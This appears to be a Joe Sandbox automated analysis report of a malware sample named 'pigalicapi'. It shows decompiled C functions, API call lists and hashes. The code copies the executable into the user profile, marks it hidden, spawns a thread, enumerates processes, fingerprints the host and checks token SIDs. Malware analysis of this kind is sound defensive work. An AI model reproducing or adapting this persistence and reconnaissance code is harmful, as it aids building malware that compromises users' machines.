                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 373b8e4e99a87a8d827194ac4d40e33f7370331306f5c0126c3acbb6926a3c99
                                                                                                                                                                                                                                                                                                        • Instruction ID: 907ea9e22f3bc7de270d94c0b3c6814717ed82fb3aa5fa76b84ea709fc40a9ac
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 373b8e4e99a87a8d827194ac4d40e33f7370331306f5c0126c3acbb6926a3c99
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 549105B4D40208EFEF18DFA4D889BAEBBB5BB48705F10451AFA06AA280D7749954CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                        			E024E5700(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                                                                                                                        				long _v560;
                                                                                                                                                                                                                                                                                                        				void* _v564;
                                                                                                                                                                                                                                                                                                        				long _v568;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					E024E8F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                                                        					E024E1CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                                                        					E024E9D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                                                        					E024E7B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                                        					_t59 = E024E5CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					E024E7D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                                                        					_v28 = 0x207;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207); // executed
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v32 = _t67;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                                                        						if(_v560 > 0) {
                                                                                                                                                                                                                                                                                                        							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        							_v564 = _t71;
                                                                                                                                                                                                                                                                                                        							if(_v564 != 0) {
                                                                                                                                                                                                                                                                                                        								_v568 = 0;
                                                                                                                                                                                                                                                                                                        								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                                                        								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                                                        									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x024e5709
                                                                                                                                                                                                                                                                                                        0x024e5711
                                                                                                                                                                                                                                                                                                        0x024e5729
                                                                                                                                                                                                                                                                                                        0x024e5742
                                                                                                                                                                                                                                                                                                        0x024e5756
                                                                                                                                                                                                                                                                                                        0x024e576e
                                                                                                                                                                                                                                                                                                        0x024e5786
                                                                                                                                                                                                                                                                                                        0x024e5798
                                                                                                                                                                                                                                                                                                        0x024e57a3
                                                                                                                                                                                                                                                                                                        0x024e57b8
                                                                                                                                                                                                                                                                                                        0x024e57cc
                                                                                                                                                                                                                                                                                                        0x024e57d4
                                                                                                                                                                                                                                                                                                        0x024e57e4
                                                                                                                                                                                                                                                                                                        0x024e580a
                                                                                                                                                                                                                                                                                                        0x024e57e6
                                                                                                                                                                                                                                                                                                        0x024e57f1
                                                                                                                                                                                                                                                                                                        0x024e57f1
                                                                                                                                                                                                                                                                                                        0x024e582f
                                                                                                                                                                                                                                                                                                        0x024e5854
                                                                                                                                                                                                                                                                                                        0x024e585a
                                                                                                                                                                                                                                                                                                        0x024e5861
                                                                                                                                                                                                                                                                                                        0x024e5873
                                                                                                                                                                                                                                                                                                        0x024e5880
                                                                                                                                                                                                                                                                                                        0x024e5896
                                                                                                                                                                                                                                                                                                        0x024e589c
                                                                                                                                                                                                                                                                                                        0x024e58a9
                                                                                                                                                                                                                                                                                                        0x024e58ab
                                                                                                                                                                                                                                                                                                        0x024e58d0
                                                                                                                                                                                                                                                                                                        0x024e58e2
                                                                                                                                                                                                                                                                                                        0x024e5912
                                                                                                                                                                                                                                                                                                        0x024e58e4
                                                                                                                                                                                                                                                                                                        0x024e58ed
                                                                                                                                                                                                                                                                                                        0x024e58fc
                                                                                                                                                                                                                                                                                                        0x024e58fc
                                                                                                                                                                                                                                                                                                        0x024e58e2
                                                                                                                                                                                                                                                                                                        0x024e58a9
                                                                                                                                                                                                                                                                                                        0x024e591c
                                                                                                                                                                                                                                                                                                        0x024e591c
                                                                                                                                                                                                                                                                                                        0x024e5922
                                                                                                                                                                                                                                                                                                        0x024e5922
                                                                                                                                                                                                                                                                                                        0x024e592c

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: GetVersionExA.KERNEL32(0000009C), ref: 024E8FF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: GetSystemInfo.KERNEL32(?), ref: 024E9009
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 024E902E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 024E9222
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrlenA.KERNEL32(?), ref: 024E922F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,024EC980), ref: 024E9242
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,?), ref: 024E9253
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrlenA.KERNEL32(00000000), ref: 024E925D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 024E9275
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 024E5742
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024E1CB1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 024E1CE1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: GetCurrentProcessId.KERNEL32 ref: 024E1CEE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 024E1D52
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 024E1D78
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 024E1D92
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 024E1DA6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 024E1DDC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1DFB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E21
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1CA0: CloseHandle.KERNEL32(000000FF), ref: 024E1E4B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9D20: GetSystemDirectoryA.KERNEL32 ref: 024E9D9A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 024E9DDD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9D20: StringFromCLSID.OLE32(00000020,?), ref: 024E9EF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: lstrlenA.KERNEL32(00000000), ref: 024E5CEB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5D10
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E5D29
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5D45
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E5D6D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E5D99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E5DA3
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 024E57B8
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E57F1
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 024E580A
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 024E582F
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5854
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 024E586D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5896
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E58D0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E5912
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E591C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 1116761331-4090404022
                                                                                                                                                                                                                                                                                                        • Opcode ID: cf5a5b280d0d8650e11acafc6a90087f0e8dad50cf857a4271c4276ac91d4c80
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5bd8112d48e739b599eb1ba5d97740113c7b0139a46ec1129dbc77c7410b75ed
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf5a5b280d0d8650e11acafc6a90087f0e8dad50cf857a4271c4276ac91d4c80
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C5184B1940208FBFF14DFA0DC99FEE7735AB44709F008599F60A6A281D774AA90CF94
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 774 24e1120-24e1134 775 24e113a-24e113e 774->775 776 24e12bb-24e12c1 774->776 775->776 777 24e1144-24e1150 lstrlenA 775->777 777->776 778 24e1156-24e1162 lstrlenA 777->778 778->776 779 24e1168-24e1175 778->779 780 24e118a-24e119b GetEnvironmentVariableA 779->780 781 24e1177-24e1188 GetAllUsersProfileDirectoryA 779->781 782 24e11a1-24e11d9 wnsprintfA lstrcmpiA 780->782 781->782 783 24e11db-24e11e1 782->783 784 24e1216-24e1287 call 24e97a0 lstrcpyA * 2 CreateThread 782->784 783->784 785 24e11e3-24e1210 CopyFileA SetFileAttributesA lstrcpyA 783->785 788 24e1289-24e128d 784->788 789 24e12a3-24e12b8 call 24e97c0 784->789 785->784 790 24e128f-24e1298 788->790 791 24e129a-24e12a1 788->791 789->776 790->791 791->776
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                                        			E024E1120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                                                                                                                        				void* _v288;
                                                                                                                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                                                                                                                        				void* _v560;
                                                                                                                                                                                                                                                                                                        				void* _v564;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x104;
                                                                                                                                                                                                                                                                                                        					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                                                        					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                                                        						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                                                        						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v560 = E024E97A0(0x30d);
                                                                                                                                                                                                                                                                                                        					_v16 = _v560;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                                                        					_t58 = CreateThread(0, 0, E024E12D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v288 = _t58;
                                                                                                                                                                                                                                                                                                        					if(_v288 == 0) {
                                                                                                                                                                                                                                                                                                        						_v564 = _v16;
                                                                                                                                                                                                                                                                                                        						E024E97C0(_v564);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                                        							 *_a20 = _v288;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x024e1129
                                                                                                                                                                                                                                                                                                        0x024e1134
                                                                                                                                                                                                                                                                                                        0x024e1168
                                                                                                                                                                                                                                                                                                        0x024e1175
                                                                                                                                                                                                                                                                                                        0x024e119b
                                                                                                                                                                                                                                                                                                        0x024e1177
                                                                                                                                                                                                                                                                                                        0x024e1182
                                                                                                                                                                                                                                                                                                        0x024e1182
                                                                                                                                                                                                                                                                                                        0x024e11bd
                                                                                                                                                                                                                                                                                                        0x024e11d9
                                                                                                                                                                                                                                                                                                        0x024e11f0
                                                                                                                                                                                                                                                                                                        0x024e11ff
                                                                                                                                                                                                                                                                                                        0x024e1210
                                                                                                                                                                                                                                                                                                        0x024e1210
                                                                                                                                                                                                                                                                                                        0x024e1223
                                                                                                                                                                                                                                                                                                        0x024e122f
                                                                                                                                                                                                                                                                                                        0x024e1238
                                                                                                                                                                                                                                                                                                        0x024e1249
                                                                                                                                                                                                                                                                                                        0x024e125d
                                                                                                                                                                                                                                                                                                        0x024e1274
                                                                                                                                                                                                                                                                                                        0x024e127a
                                                                                                                                                                                                                                                                                                        0x024e1287
                                                                                                                                                                                                                                                                                                        0x024e12a6
                                                                                                                                                                                                                                                                                                        0x024e12b3
                                                                                                                                                                                                                                                                                                        0x024e1289
                                                                                                                                                                                                                                                                                                        0x024e128d
                                                                                                                                                                                                                                                                                                        0x024e1298
                                                                                                                                                                                                                                                                                                        0x024e1298
                                                                                                                                                                                                                                                                                                        0x024e129a
                                                                                                                                                                                                                                                                                                        0x024e129a
                                                                                                                                                                                                                                                                                                        0x024e1287
                                                                                                                                                                                                                                                                                                        0x024e12c1

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E1148
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E115A
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 024E1182
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E97CF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E97C0: RtlFreeHeap.NTDLL(00000000), ref: 024E97D6
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 024E119B
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 024E11BD
                                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(00000104,?), ref: 024E11D1
                                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000104,?,00000000), ref: 024E11F0
                                                                                                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000006), ref: 024E11FF
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000104,?), ref: 024E1210
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 024E1249
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-00000208,00000000), ref: 024E125D
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E1274
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                                                        • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                                                        • Opcode ID: d9dd8403d977f554838e6ba219013a132a30428e89e4f5ed6b9b70c2073530da
                                                                                                                                                                                                                                                                                                        • Instruction ID: 507595f72c0321370dadaac13f5800ec933ddb972f2a4f36faf95b7de43b77ac
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9dd8403d977f554838e6ba219013a132a30428e89e4f5ed6b9b70c2073530da
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B413175940208EBEF14CFE4DC89FDE77B4AB48705F00859AEA1E9A281D774DA94CF90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                                        			E024E99F0() {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v1044;
                                                                                                                                                                                                                                                                                                        				char _v2068;
                                                                                                                                                                                                                                                                                                        				long _v2072;
                                                                                                                                                                                                                                                                                                        				void* _v2076;
                                                                                                                                                                                                                                                                                                        				void* _v2080;
                                                                                                                                                                                                                                                                                                        				char _v2084;
                                                                                                                                                                                                                                                                                                        				int _t43;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_v8 = 0x400;
                                                                                                                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2072 = 0;
                                                                                                                                                                                                                                                                                                        				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                                                        				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                                                                                                        					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                                                        				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                                                        				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                                                        				_v2084 = 0x44;
                                                                                                                                                                                                                                                                                                        				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                                        							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x024e99f9
                                                                                                                                                                                                                                                                                                        0x024e99fd
                                                                                                                                                                                                                                                                                                        0x024e9a19
                                                                                                                                                                                                                                                                                                        0x024e9b80
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9b80
                                                                                                                                                                                                                                                                                                        0x024e9a1f
                                                                                                                                                                                                                                                                                                        0x024e9a3a
                                                                                                                                                                                                                                                                                                        0x024e9a4a
                                                                                                                                                                                                                                                                                                        0x024e9b76
                                                                                                                                                                                                                                                                                                        0x024e9b7a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9b7a
                                                                                                                                                                                                                                                                                                        0x024e9a56
                                                                                                                                                                                                                                                                                                        0x024e9a77
                                                                                                                                                                                                                                                                                                        0x024e9a7f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9a8b
                                                                                                                                                                                                                                                                                                        0x024e9a91
                                                                                                                                                                                                                                                                                                        0x024e9aad
                                                                                                                                                                                                                                                                                                        0x024e9acb
                                                                                                                                                                                                                                                                                                        0x024e9ae6
                                                                                                                                                                                                                                                                                                        0x024e9b04
                                                                                                                                                                                                                                                                                                        0x024e9b1c
                                                                                                                                                                                                                                                                                                        0x024e9b3a
                                                                                                                                                                                                                                                                                                        0x024e9b52
                                                                                                                                                                                                                                                                                                        0x024e9b70
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9b72
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9b3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9b06
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 024E9A0A
                                                                                                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 024E9A11
